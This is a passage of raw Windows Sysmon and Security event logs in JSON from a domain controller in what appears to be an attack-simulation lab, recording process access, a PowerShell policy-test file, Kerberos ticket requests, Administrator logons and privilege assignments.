C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.928","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8534,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.928\r\nSourceProcessGUID: {41C8662E-22D1-5F25-0000-00107FAD1100}\r\nSourceProcessId: 3592\r\nSourceThreadId: 4220\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-22BF-5F25-0000-00109C5D1100}\r\nTargetProcessId: 3408\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.928","SourceProcessGUID":"{41C8662E-22D1-5F25-0000-00107FAD1100}","SourceProcessId":"3592","SourceThreadId":"4220","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-22BF-5F25-0000-00109C5D1100}","TargetProcessId":"3408","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8535,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.959\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22D1-5F25-0000-0010A6BE1100}\r\nTargetProcessId: 3408\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.959","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22D1-5F25-0000-0010A6BE1100}","TargetProcessId":"3408","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8536,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.959\r\nProcessGuid: {41C8662E-22D1-5F25-0000-0010A6BE1100}\r\nProcessId: 3408\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_xlqdmej4.3q0.ps1\r\nCreationUtcTime: 2020-08-01 08:07:45.959","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.959","ProcessGuid":"{41C8662E-22D1-5F25-0000-0010A6BE1100}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_xlqdmej4.3q0.ps1","CreationUtcTime":"2020-08-01 08:07:45.959","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220722,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220723,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{A9E384E4-1451-931F-58CE-E6B791FBEAF3}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{A9E384E4-1451-931F-58CE-E6B791FBEAF3}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220724,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{A9E384E4-1451-931F-58CE-E6B791FBEAF3}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{A9E384E4-1451-931F-58CE-E6B791FBEAF3}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220725,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x11AC5E\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{A9E384E4-1451-931F-58CE-E6B791FBEAF3}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x11ac5e","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{A9E384E4-1451-931F-58CE-E6B791FBEAF3}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220726,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x11AC5E\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x11ac5e","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220727,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220728,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{A9E384E4-1451-931F-58CE-E6B791FBEAF3}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{A9E384E4-1451-931F-58CE-E6B791FBEAF3}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220729,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{A9E384E4-1451-931F-58CE-E6B791FBEAF3}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{A9E384E4-1451-931F-58CE-E6B791FBEAF3}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220730,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount 